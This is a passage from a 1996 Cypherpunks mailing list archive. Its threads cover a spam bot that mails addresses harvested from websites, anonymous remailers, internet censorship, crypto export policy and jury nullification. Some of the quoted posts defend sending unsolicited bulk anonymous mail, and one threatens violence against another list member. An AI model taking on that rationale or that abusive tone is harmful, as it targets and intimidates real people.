apparently made it all a net profit for them, apparently. What we really need is to improve our defensive filtering mechanisms. Someday soon we'll all have our own personal software agents that will handle all this stuff for us. Optimistic Dave From robert at precipice.v-site.net Wed Sep 11 20:56:01 1996 From: robert at precipice.v-site.net (HipCrime) Date: Thu, 12 Sep 1996 11:56:01 +0800 Subject: [Fwd: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]] Message-ID: <32373072.3E41@precipice.v-site.net> Does this maillist filter out messages from NON-subscribers? To: HipCrime Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] From: Admin Date: Wed, 11 Sep 1996 15:14:26 -0600 Cc: CYPERPUNKS at TOAD.COM, Geoff White , , jlasser at rwd.goucher.edu At 01:52 PM 9/11/96 -0700, you wrote: This is an absurd and inaccurate analogy. The mailBot simply pushes *mailto:* tags that people have willingly placed on their public websites. They invite the mail so a more accurate analogy would be that City Hall puts up a public suggestion box and invites comments. The bot then puts one, and only one, unsigned anonymous suggestion into the box. It then goes on to the Art Gallery where they too have put up a public suggestion box, and the bot places one, and only one, anonymous suggestion in that box also...and it moves on to the next publicly accessable suggestion box that it finds, each time putting in one, and only one, message. Can the College-aged mind these days not develop a rational, concise, accurate and logical analogy that stays on point? Think about it... or take down the public suggestion boxes if one doesn't like what one finds inside. If you invite feedback...it will come. admin There is > >HipCrime wrote: >> Be honest, all you really care about is something which >> "threatens the existence" your little baby. > >I think you were referring to yourself, Robert. :) > > >Since you don't seem to understand the concept of spam very well yet, >try this little experiment: > >Go downtown to City Hall and post advertisements for your website on >all the walls and doors. Be sure to put one on the Mayor's office and >all the members of the City Council. If they complain, explain to them >why they are weak-minded souls who can't remove unwanted messages. > >Go to the local art gallery and post your signs all over. Tell people >that since your web site is an "art project", that you are posting EXACTLY >on topic, to an "appropriate group". Ask, "So, what's your problem ?!?" > >Pass out survey forms. Ask people where they want to see advertisements. >Go to these sites and spray-paint your http address. If people complain >that you are "harassing" them, ask them why a whopping eighteen letters >written on the wall is harassment. Tell them it's not *your* fault, >that you're just doing what other people told you to. Explain how many >trees you are saving by using spray-paint instead of paper. > >When the police handcuff you and take you away, complain that they are >censoring you. Tell the judge that you want to sue the cops for violating >your civil rights. While you're in jail, think about why what you did >was wrong. > <>________________Lowest_Priced_Long_Distance__________________<> ||Long Distance 9.9�/min |Helping hardworking people || ||9.9� Anytime, Anywhere in US! |like yourself pay the || ||Free sign-up, 6 second billing |lowest possible price for || ||http://www.superhot.com/phone |high quality LD service. || <>-----------------------1_303_692_5190------------------------<> From stewarts at ix.netcom.com Wed Sep 11 20:59:31 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Thu, 12 Sep 1996 11:59:31 +0800 Subject: NewsBytes ****Singapore - Leased Line Customers Bypass Censorship Message-ID: <199609112142.RAA23085@attrh1.attrh.att.com> ****Singapore - Leased Line Customers Bypass Censorship By Martyn Williams. Individual users of the Internet in Singapore may not be able to access the latest online images from Playboy after next Monday, but those at major corporations and large companies will find no restrictions to their World Wide Web surfing. [Newsbytes, (I just have the header, not the full article; sorry.) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From chuck at nova1.net Wed Sep 11 21:05:49 1996 From: chuck at nova1.net (Chuck Thompson) Date: Thu, 12 Sep 1996 12:05:49 +0800 Subject: Child porn as thoughtcrime Message-ID: <1.5.4.32.19960911220622.0067ad04@mail.nova-net.net> Well Andrew, pornography is meant to lead to arousal, which can lead to aggression, which may lead to abuse. It's a fairly common path according to what I've read on deviancy. Following is one association's opinion, but don't stop there, read for yourself what some of the deviants themselves have to say: An excerpt from the American Pyschiatric Association > The argument is not dependent upon whether or not actual >> children are used, any more than whether or not an actual gun >> is used in a robbery - the net effect is the same. Children >> are harmed by the promotion of child porn because it leads to >> the abuse/exploitation of kids. > >I don't believe you. Prove that drawings of children having sex leads to >the abuse/explaitation of kids. Provide some evidence... > > >andrew > Regards, Chuck Thompson From andy at CCMSD.chem.uga.edu Wed Sep 11 21:11:24 1996 From: andy at CCMSD.chem.uga.edu (Andy Dustman) Date: Thu, 12 Sep 1996 12:11:24 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] In-Reply-To: <199609112124.PAA11039@rintintin.Colorado.EDU> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 11 Sep 1996, Admin wrote: > >This is an absurd and inaccurate analogy. The mailBot simply pushes > >*mailto:* tags that people have willingly placed on their public websites. > >They invite the mail so a more accurate analogy would be that City Hall puts > >up a public suggestion box and invites comments. The bot then puts one, and > >only one, unsigned anonymous suggestion into the box. It then goes on to the You're sending out messages, inviting people to visit your web site, but you're using anonymous remailers because... you don't want people to know who you are? Then why invite them to your site (or even have a site)? It's like if I sent out postcards to people with no return address saying, "Please stop by 1313 Mockingbird Lane for snacks and refreshments. Signed, A Friend". (Note, this is not my real address.) Only in this case the postcards don't have any stamps so the people who receive them have to pay the postage. Which is precisely what you're doing: Sending someone e-mail costs them time and it often costs them money. Sending it through an anonymous remailer accomplishes four things: 1) People can't complain to you to stop sending them mail. 2) It costs us, the International Secret Cabal of Anonymous Remailer Operators, time and money for no good reason, because you are sending anonymous mail and not making yourself anonymous. 3) You're pissing off a bunch of people, and the only ones they can take their frustrations out on or complain to is us. 4) It's giving us a bad rap, man, and that's the *last* thing the remailer net needs now. I could care less about your little applet, or what you have to say; in the words of Thomas Jefferson, "it neither breaks my leg nor picks my pocket." Until, that is, you start sending it through my remailer, and *then* you start picking my pocket. The remailers of the world don't exist to provide non-anonymous anonymous advertising, which you could do just as well on your own sending forged e-mail headers from netcom. Andy Dustman / Computational Center for Molecular Structure and Design / UGA ===== For PGP public key: finger andy at neptune.chem.uga.edu | pgp -fka ===== Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net http://charon.chem.uga.edu/~andy mailto:andy at CCMSD.chem.uga.edu <}+++< -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjdoky0jMb7JduJJAQGEhAQAt6t18GgMP3v6axTGtNiUHXwNN7UR/V+F XAZtvTXgg9KFR+ZwnfJz3IMrry0aQCNMC2Ude7mldFyfq8FqVVrA6sE26rwYvWUS U3C3SCiDXhp3rn9RDfbWV8mZcnC6IRHYz9o5qyuhZTfvGdlZr7/nDTOZZPO7icCN MiYEGcjJzqY= =l0Ek -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Wed Sep 11 21:12:46 1996 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Thu, 12 Sep 1996 12:12:46 +0800 Subject: Unsolicited harrassing e-mail from In-Reply-To: <199609112356.TAA16511@attrh1.attrh.att.com> Message-ID: Please stop e-mailing me, cc:ing me, or otherwise harrassing me. I have no connection with the thread you're quoting and don't want to receive any more e-mail from you. stewarts at ix.netcom.com writes: > >> There > >> are a number of anonymous remailers out in cyberspace, but it has been > >> stated by a knowledgeable source that a number of them are being operated > >> by law enforcement agencies (presumably to troll for criminal activity). A > > > >Can someone verify/discredit/comment on this statement? Who is the > >knowledgeable source? > > Definitely true. Zero is a number, and there are also larger numbers. > KOTM = Kook Of The Month. > > # Thanks; Bill > # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com > # > # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto > From blancw at microsoft.com Wed Sep 11 21:17:22 1996 From: blancw at microsoft.com (Blanc Weber) Date: Thu, 12 Sep 1996 12:17:22 +0800 Subject: Child Porn as Thoughtcrime Message-ID: >From: Chuck Thompson , a True Believer, inquired: > >What in the devil are you trying to say? Maybe I'm one of those stupid >citizen units. I just don't get it - I'd like to, but I don't. How about >rephrasing your comments so that us average citizen units can understand >your wisdom. >........................................................... > > >Well then I'll spell it out for you: > >. I actually said that it is "a government" which will posture as >sympathetic towards the whiningH^H^H^H^H^Hconcerns of citizens. > >. Political candidates very well know that citizens (voters) are looking for >someone to save them from what ails them. Therefore many candidates will >make the right statements about upholding similar values. They start making >sounds like they are going to "do something about it" (about whatever the >latest issue is). And their supporters will like these sounds. Reagan >made a quote about this sometime, something like: "They may not hear the >lyrics, but they hear the music." The voters feel good because they expect >that their discomfort will be taken care of. Therefore they vote for the >candidate most positive towards their needs. The candidate is elected to >the office for which they are running and thereby achieve their goal. > >. The more that voters seek the attention of government assistance for their >myriad problems, the more that the sphere of government involvement in the >details of everyone's daily lives enlarges. This enlargement of the >government sphere of involvement, as encouraged by citizens, expands as >people find more things to complain about. The more personal control over >their problems which they abdicate to the government, the more control it >accrues. > >. Of course a government does not want to appear to be in totalitarian >control. Many citizens do want *someone* to be in control, however. They >want a benevolent overseer to be in control. As the scope of benevolent >services, as controlled by government, spreads out across the land, many >people are happy that someone is in control. > >. Some people are so happy about benevolent government control that they >want it extended towards things like their own moral preferences. Any time >that they see the evidence of anything contrary to their own moral >preferences, they want these visible signs of contrariness removed. Moral >preferences and how they relate to national circumstances are a tricky >subject for governors and legislators. But if it makes the citizens happy >and keeps the governors in office, they are willing to oblige in removing >these offenses by pursuing the "offenders". > > . Reducing the expressions of these offenders helps the governors, because >it enhances their position of control. It helps to legitimize their >activities and again enlarges their arena, their domain, of command. They >can become quite meticulous in determining what may or may not be expressed >or said which might be offensive to someone - in particular, to themselves >(because it may weaken their image of being benevolent and "in command" of >the situation). > >. At that point, anyone who can think in the abstract will be able to see >that, as expression derives from thought, that what is wrong therefore with >all of the "offenders" is their thoughts. That is why TC May called this >kind of offense the equivalent of "thought crime". There is a book about >"thought crimes" against the State which you may have heard about, though you >may not have read. > >. Thought and its relationship to the State is a deep and complex >philosophical subject. There are many posts in the cpunk archives which can >provide you with insights into the anarcho-capitalist libertarian position. > >. If you need any more details on "thought criminality", maybe Tim can >answer them for you, as he's the one who brought up the subject. I was >merely agreeing with him. > > .. >Blanc > > From frissell at panix.com Wed Sep 11 21:18:44 1996 From: frissell at panix.com (Duncan Frissell) Date: Thu, 12 Sep 1996 12:18:44 +0800 Subject: China joins Singapore, Germany, .... Message-ID: <2.2.32.19960911220537.00b17214@panix.com> At 07:43 PM 9/10/96 -0500, Declan McCullagh wrote: >I respectfully disagree. I spend most of my time going through sites like >cnn.com, hotwired.com, news.com, altavista.digital.com, yahoo.com, >lycos.com, hotbot.com, eff.org, well.com, mit.edu, whitehouse.gov, and so >on. Search engines and directories, in particular, are good chokepoints to >block. > >Blocking 100 sites would certainly be significant to me -- as long as >they're the right ones. Before the technical fixes, that is. But aren't you, the Nazis, Lee Kwan Yew, and the Heathen Chinee all committing the "Web Fallacy" -- the belief that the Web = The Net? Have you seen *any* examples of mailing list censorship? Even the mild newsgroup censorship attempts are easily dodged by picking up your news from a distant server (which is not a *technological* fix but an ordinary part of reading news since many ISPs don't carry all 30K of groups in any case). If almost all sites are ignored, if news is available from thousands of servers, and if mailing lists, IRC, telnet, ftp, gopher, etc are ignored; can we say that there is much actual net censorship going on? DCF "The Net -- where any 12 year old can defeat the governments of the world with 15 minutes work." From proff at suburbia.net Wed Sep 11 21:56:50 1996 From: proff at suburbia.net (Julian Assange) Date: Thu, 12 Sep 1996 12:56:50 +0800 Subject: talker In-Reply-To: <199609120013.RAA23678@primenet.com> Message-ID: <199609120227.MAA03680@suburbia.net> > Mailbomb me, go ahead punk, make my day, if you dare to even think > about doing so I will kick your ass, I will hurt you in ways you > cannot imagine, I have carried out vindictive personal vendettas > before and will do so again if necessary. > > Go on, I dare you, I double dare you motherfucker. > > Yours with the greatest respect: > > Paul Bradley MbM Yawn. Says more about you than him kiddo. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From declan at eff.org Wed Sep 11 22:02:24 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 12 Sep 1996 13:02:24 +0800 Subject: (Fnord) Edupage, 10 September 1996 In-Reply-To: <199609111822.LAA15291@netcom7.netcom.com> Message-ID: Ah, but first we make the use of non-escrowed crypto a felony. Then if the bad guys use it we can put 'em away for another five years. Simple. No, really. -Declan On Wed, 11 Sep 1996, Bill Frantz wrote: > I'm preaching to the choir, but I can't resist. > > >From Edupage, 10 September 1996: > >A leading Clinton Administration official ... Michael Nelson, who adds > >that organized crime members are already some of the most sophisticated > >users of computer systems and strong encryption technology. In addition, > >computer crackers will pose a more significant threat. > > The bad guys already have strong encryption. So why doesn't the Clinton > administration immediately press for the widespread deployment of strong > encryption to help defend us against the bad guys? > > > ------------------------------------------------------------------------- > Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting > (408)356-8506 | choice for best movie of | 16345 Englewood Ave. > frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA > > // declan at eff.org // I do not represent the EFF // declan at well.com // From andy at CCMSD.chem.uga.edu Wed Sep 11 22:19:02 1996 From: andy at CCMSD.chem.uga.edu (Andy Dustman) Date: Thu, 12 Sep 1996 13:19:02 +0800 Subject: na673130@anon.penet.fi gone [Anonymous service rejected your mail.] (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Looks like Spambo either deleted his id or Julf pulled the plug on him. Andy Dustman / Computational Center for Molecular Structure and Design / UGA ===== For PGP public key: finger andy at neptune.chem.uga.edu | pgp -fka ===== Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net http://charon.chem.uga.edu/~andy mailto:andy at CCMSD.chem.uga.edu <}+++< - ---------- Forwarded message ---------- Date: Thu, 12 Sep 96 04:36:13 +0300 From: daemon at anon.penet.fi To: andy at ccmsd.chem.uga.edu Subject: Anonymous service rejected your mail. You, andy at ccmsd.chem.uga.edu, have requested mail forwarding to na673130. This was rejected, as the user is unknown. Either the id has never been allocated, or the id has been removed at the request of the user. Contents of message follows: [deleted] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjdsIy0jMb7JduJJAQHl1AQAoLN85rIEqLBSKm/0dVjj7eD/aDh6lpKX B75xki8v20+LFku9ddXy1rb8KEKqnMVy/WSGlB18gNvqFJTbw4obzB4/M+df3JPy 893mVkaJd24d+OZWYwTx1Nc19VIho9WXSC/8ohJhVN+R44R4+yWjHzupCAMxGfiY wWzgMqQXlwI= =7KZS -----END PGP SIGNATURE----- From tcmay at got.net Wed Sep 11 22:19:24 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 12 Sep 1996 13:19:24 +0800 Subject: Jury Nullification = Voting One's Conscience Message-ID: At 9:18 PM 9/11/96, Brian Davis wrote: >On Wed, 11 Sep 1996, jonathon wrote: > >> On Wed, 11 Sep 1996, Gary Howland wrote: >> >> > > But the public *is* asked to assent to those methods - your chance >>to vote >> > > on them is known colloquially as "jury duty". >> >> But judges have said that Jury Nullification is not acceptable >> legal practice. > >And other judges have said the opposite. And I don't think there has _ever_ been a case of a juror prosecuted/jailed for voting his or her conscience, regardless of jury instructions. Short of explicitly selling one's vote, or discussing the case during deliberations with outsiders (and probably not even then), one is essentially free to vote one's conscience (however foolishly, as the O.J. case showed). And the principle is a good one: jurors should not have to fear prosecution for voting their consciences, regardless of technical details imposed by a judge. And, of course, jurors are not required to give a court their "reasons" for voting as they do. Though I often condemn aspects of the American political and legal system, it is true that an awful lot of things are done right. --Tim May, who served _once_ on a jury (for a speeding case) in 1973, who was called once since then, but not actually called for a jury. (I vote every election, I am duly registered with the DMV, so I wonder why I have only served once in 24+ years of eligibility.) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Wed Sep 11 22:19:26 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 12 Sep 1996 13:19:26 +0800 Subject: Hacking Mobil Telephone System ? Message-ID: <199609112119.OAA04402@mail.pacifier.com> At 03:13 PM 9/11/96 -6, Peter Trei wrote: > >The differences between US and European nomenclature can be subtle, yet >important. Quick - which is likely to have had warmer weather: 1/8/96, or >8/1/96? Sorry to add more complication, but "northern or southern latitude?" Jim Bell jimbell at pacifier.com From rwright at adnetsol.com Wed Sep 11 22:22:05 1996 From: rwright at adnetsol.com (Ross Wright) Date: Thu, 12 Sep 1996 13:22:05 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] Message-ID: <199609120245.TAA28195@adnetsol.adnetsol.com> Sirs: I must agree that having a website invites unsolicited e-mail, if only to comment that people have seen the site. I send unsolicited e-mail to website owners as part of my marketing plan. On Or About: 11 Sep 96 at 21:34, Andy Dustman wrote: > You're sending out messages, inviting people to visit your web site, but > you're using anonymous remailers because... you don't want people to know > who you are? Then why invite them to your site (or even have a site)? That's what makes it smell fishy. When I send unsolicited e-mail I give up the whole deal: phone number and all. If someone complains, I make great effort to never contact that person again. Either you want people to know who you are or you don't. > Which is precisely what you're doing: Sending someone e-mail > costs them time and it often costs them money. As I said having a website invites comments. It's like being a public figure. In effect you are publishing your e-mail address. > 4) It's giving us a bad > rap, man, and that's the *last* thing the remailer net needs now. > The remailers of the world don't exist > to provide non-anonymous anonymous advertising, which you could do just as > well on your own sending forged e-mail headers from netcom. Just like all the seedy low life multi-level-marketing jerks! No need to use a remailer for that. Just 2 cents worth. Ross =========== Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From robert at precipice.v-site.net Wed Sep 11 22:26:29 1996 From: robert at precipice.v-site.net (HipCrime) Date: Thu, 12 Sep 1996 13:26:29 +0800 Subject: [Fwd: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]] Message-ID: <32377788.758E@precipice.v-site.net> -- Security is mostly a superstition. It does not exist in nature, nor do the children of men as a whole experience it. Avoiding danger is no safer in the long run than outright exposure. Life is either a daring adventure, or nothing. -- Hellen Keller To: cypherpunks at toad.com Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] From: Admin Date: Wed, 11 Sep 1996 15:20:35 -0600 Cc: remailer-operators at c2.org Sender: owner-cypherpunks at toad.com >This is an absurd and inaccurate analogy. The mailBot simply pushes >*mailto:* tags that people have willingly placed on their public websites. >They invite the mail so a more accurate analogy would be that City Hall puts >up a public suggestion box and invites comments. The bot then puts one, and >only one, unsigned anonymous suggestion into the box. It then goes on to the >Art Gallery where they too have put up a public suggestion box, and the bot >places one, and only one, anonymous suggestion in that box also...and it >moves on to the next publicly accessable suggestion box that it finds, each >time putting in one, and only one, message. > >Can the College-aged mind these days not develop a rational, concise, >accurate and logical analogy that stays on point? > >Think about it... or take down the public suggestion boxes if one doesn't >like what one finds inside. If you invite feedback...it will come. > >admin > > >There is >> >>HipCrime wrote: >>> Be honest, all you really care about is something which >>> "threatens the existence" your little baby. >> >>I think you were referring to yourself, Robert. :) >> >> >>Since you don't seem to understand the concept of spam very well yet, >>try this little experiment: >> >>Go downtown to City Hall and post advertisements for your website on >>all the walls and doors. Be sure to put one on the Mayor's office and >>all the members of the City Council. If they complain, explain to them >>why they are weak-minded souls who can't remove unwanted messages. >> >>Go to the local art gallery and post your signs all over. Tell people >>that since your web site is an "art project", that you are posting EXACTLY >>on topic, to an "appropriate group". Ask, "So, what's your problem ?!?" >> >>Pass out survey forms. Ask people where they want to see advertisements. >>Go to these sites and spray-paint your http address. If people complain >>that you are "harassing" them, ask them why a whopping eighteen letters >>written on the wall is harassment. Tell them it's not *your* fault, >>that you're just doing what other people told you to. Explain how many >>trees you are saving by using spray-paint instead of paper. >> >>When the police handcuff you and take you away, complain that they are >>censoring you. Tell the judge that you want to sue the cops for violating >>your civil rights. While you're in jail, think about why what you did >>was wrong. <>________________Lowest_Priced_Long_Distance__________________<> ||Long Distance 9.9�/min |Helping hardworking people || ||9.9� Anytime, Anywhere in US! |like yourself pay the || ||Free sign-up, 6 second billing |lowest possible price for || ||http://www.superhot.com/phone |high quality LD service. || <>-----------------------1_303_692_5190------------------------<> From declan at eff.org Wed Sep 11 22:58:37 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 12 Sep 1996 13:58:37 +0800 Subject: What is best policy paper on crypto? Message-ID: I happen to know that an influential Congresspern will be meeting with some Cato folks tomorrow morning, so I'm assuming this isn't an idle request. -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // ---------- Forwarded message ---------- Date: Wed, 11 Sep 1996 16:46:09 -0400 From: Solveig Bernstein To: fight-censorship at vorlon.mit.edu Subject: What is best policy paper on crypto? If you folks were to pick one policy paper or book or magazine article that did the best job of explaining why export controls on crypto were bad, and/or why key escrow is not a good idea, which one would you pick? I'm looking for something that would be helpful to a Congressperson. Please feel free to e-mail suggestions to me privately so as not to clutter up the list. ********************************************************************** Solveig Bernstein, Esq. (202) 789-5274 (202) 842-3490 (fax) Assistant Director of Telecommunications & Technology Studies Cato Institute 1000 Mass. Ave. NW Washington, DC 20001 From drose at AZStarNet.com Wed Sep 11 23:14:34 1996 From: drose at AZStarNet.com (David M. Rose) Date: Thu, 12 Sep 1996 14:14:34 +0800 Subject: That Evil Internet, Pt. XXIII Message-ID: <199609120410.VAA11385@web.azstarnet.com> Caught an interesting segment on this evening's PBS news program with Jim Lehrer. Two senators were discussing whether the U.S. should sign the international agreement banning chemical warfare. Sen. Kyl maintains that verification is impossible and that Iraq, Libya, and North Korea will never participate. Sen. Nunn responds that we should sign anyway. Besides, he adds in the non sequitur of the week, anyone can get instructions on how to build chemical weapons on the Internet. I guess the Internet isn't just for pornography and conventional bomb-making advice anymore. Dave Rose From Adamsc at io-online.com Wed Sep 11 23:28:50 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 12 Sep 1996 14:28:50 +0800 Subject: Hacking Mobil Telephone System ? Message-ID: <19960912040558171.AAA89@IO-ONLINE.COM> On Wed, 11 Sep 1996 18:56:10 -0400 (EDT), Mark O. Aldrich wrote: >After having traveled in Europe, I was certainly familiar with the >difference in the notation. You also think, however, that I would have >paid more attention to what the hell I was reading before I shot off my >mouth (via my keyboard), but I didn't. I think this is called a "brain >fart" (note to our European brothers and sisters - over there, I think you >call it a "mental fugue" or "Parliamentary election," I'm nor sure which). I've always wondered if the makers of mailer software couldn't include a delay option, so that, say, a message might be held for 10 minutes and then sent. Imagine how many of the "Sorry about x; I meant y" posts we'd never see. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From snow at smoke.suba.com Wed Sep 11 23:34:59 1996 From: snow at smoke.suba.com (snow) Date: Thu, 12 Sep 1996 14:34:59 +0800 Subject: Guns Don't Kill People, IP Does In-Reply-To: Message-ID: On Tue, 10 Sep 1996, Stephan Schmidt wrote: > > > One thought : How many of you would support terrorist > > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > > > -stephan > > Consdering how none of the above incidents are connected in any way > > to the internet, what do you mean? And what if there were bomb making > Sorry for my bad English, perhaps I got misunderstood. > Would you run a WWW site where the (say there where some) > terrorist who shot down (a wild assumtion too) the TWA plane > claiming it was right and all people should fight 'evil > America'. Because of your web site there are other bomb > attacks in the US (or somewhere else, the country is not that > important) (although it's of course impossible to proove that > this bombings are 'inspired' by your web site). > Would you support the freedom of speech in this way ? If they paid me to host the site, yes. If I agreed with their reasons or goals, I might even give them a discount. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From jimbell at pacifier.com Wed Sep 11 23:59:45 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 12 Sep 1996 14:59:45 +0800 Subject: (Fnord) Edupage, 10 September 1996 Message-ID: <199609120436.VAA06548@mail.pacifier.com> >------- Forwarded Message Follows ------- >************************************************************ >Edupage, 10 September 1996. Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. >************************************************************ > >TOP STORIES > Wired World Will "Diminish National Sovereignty" >[..] >WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY" >A leading Clinton Administration official on information security and >cryptography matters says that traditional notions of sovereignty, national >security and warfare will be undermined by the year 2020, when the whole >world is "wired" and e-cash is the norm. 24 years from now? He thinks it'll take that long?!? 24 years _ago_ the 4004 microprocessor barely existed. And if anything, change is accelerating very rapidly. >The result will be less powerful >governments in relation to criminal organizations such as the Mafia and >international drug cartels, Organizations which exist only because of the existence of government... >says Michael Nelson, who adds that organized >crime members are already some of the most sophisticated users of computer >systems and strong encryption technology. In addition, computer crackers >will pose a more significant threat. In response, Nelson advocates >resolving the issue of whether unauthorized access of a computer is an "act >of trespass" or an "act of war," and prosecuting the intrusions accordingly. >(BNA Daily Report for Executives 6 Sep 96 A14) I'd sure like to be able to corner this guy and point out that there are people who believe that _regulating_ the Internet should either be considered an "act of trespass" or an "act of war." And does he want to be punished, or merely stopped? Jim Bell jimbell at pacifier.com From stewarts at ix.netcom.com Thu Sep 12 00:01:16 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 12 Sep 1996 15:01:16 +0800 Subject: Bay Area Cypherpunks Meeting Saturday 9/14, 12-6PDT, Stanford Message-ID: <199609120456.VAA14292@dfw-ix11.ix.netcom.com> The monthly Bay Area Cypherpunks Meeting will be held Saturday, September 14th, at the picnic tables outside Tressider Hall at Stanford University. Lunch and general hanging out begin at 12:00, Program begins at 1:00. The coffee shop at Tressider will be open, though the main cafeteria won't be. Some items on the agenda include John Gilmore's SWAN project, Encrypting 5% of the net by Christmas Highlights of Crypto '96 meeting in Santa Barbara Bagels and bagel paraphrenalia The remailer crisis - anon.penet.fi, creative new spammer attacks Censorship Firewalls for SG, CN, DE, etc. - designing workarounds The Bernstein Lawsuit - court date is Friday Sept. 20 Bring show&tell items. You can find a map of the Stanford campus on the web at http://www.stanford.edu/home/visitors/campus-map.html To confuse Stanford alumni, the map has been realigned with the North end up, so visitors can use it. From Campus Drive East, turn North on Mayfield Ave, turn right on Lagunita Dr, and park in the lot. Walk north to Tressider, and the tables are on the west=left side. Look for the crowd of drug smugglers, money launderers, and Suspicious Persons. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From tcmay at got.net Thu Sep 12 00:46:43 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 12 Sep 1996 15:46:43 +0800 Subject: 10 minute delay considered inconsequential Message-ID: At 4:15 AM 9/12/96, Adamsc wrote: >I've always wondered if the makers of mailer software couldn't include a delay >option, so that, say, a message might be held for 10 minutes and then sent. >Imagine how many of the "Sorry about x; I meant y" posts we'd never see. I expect there would be little effect. I suspect most of us write articles, send them out, and only notice the mistakes, typos, whatever when they are pointed out. (Very few people reread their posts prior to seeing them on the list an hour or two later, is my strong hunch. A delay of 10 minutes would not inspire many to read and reread their posts...most likely they'd just move on to other articles, other posts, and the 10 minute delay would be utterly inconsequential.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From saione at primenet.com Thu Sep 12 00:48:14 1996 From: saione at primenet.com (!.!..............................#) Date: Thu, 12 Sep 1996 15:48:14 +0800 Subject: robert and hipcirme web sight Message-ID: <199609120544.WAA11273@primenet.com> >It's obvious that this guy's true passion is fractals and raytracing. >He threw in some bomb-making stuff, but he scanned it out of a book and >probably never tried it. Compared to the rest of the site, it looks like >an afterthought. Someone who was really interested in chemistry would >have taken the time to retype the info and add their own comments. He >had a reason to have some "anarchist" info on there but he's not really >interested in it. So basically this guy is a mathematician/artist trying >to pretend he's an anarchist. If his true passion is fractals and raytracing, then why would he expend energy things other than fractals and raytracing. He may be an anarchict but wish to invest his time in fractals and raytracing rather than in explaining anarchy. >Same goes for the remailers. He claims he likes remailers and anonymity, >but he's lying. Anyone who really liked remailers/anonymity/privacy would >have pages and pages about how to use remailers, and why privacy is a good >thing. He has a reason he needs to be anonymous, but it's not because >he supports privacy. He publishes a PGP key, because he wants to pretend >he's an anarchist, and Louis Freeh told him that all evil terrorist >organizations use PGP. But he doesn't like PGP, he doesn't advocate PGP, >and he doesn't tell you where to get PGP. If his true passion were re-mailers and anonymity then he would spend pages and pages writing about them rather than just admitting to supporting them. .00010000. From attila at primenet.com Thu Sep 12 01:13:58 1996 From: attila at primenet.com (attila) Date: Thu, 12 Sep 1996 16:13:58 +0800 Subject: Bubba Bottoming out on Cocaine Paranoia? In-Reply-To: <199609110733.DAA04996@unix.asb.com> Message-ID: <199609120534.XAA06832@InfoWest.COM> another paranoid fantasy and impending preemptive strike by Bubba, or by the NWO? BTW, I really do not care how the NWO is defined --big government serving its own interests works just as well, so forget flaming me on the NWO. please do keep in mind, however, that the CFR has a undue amount of influence in Washington and the CFR is the bastion of established wealth. this is a 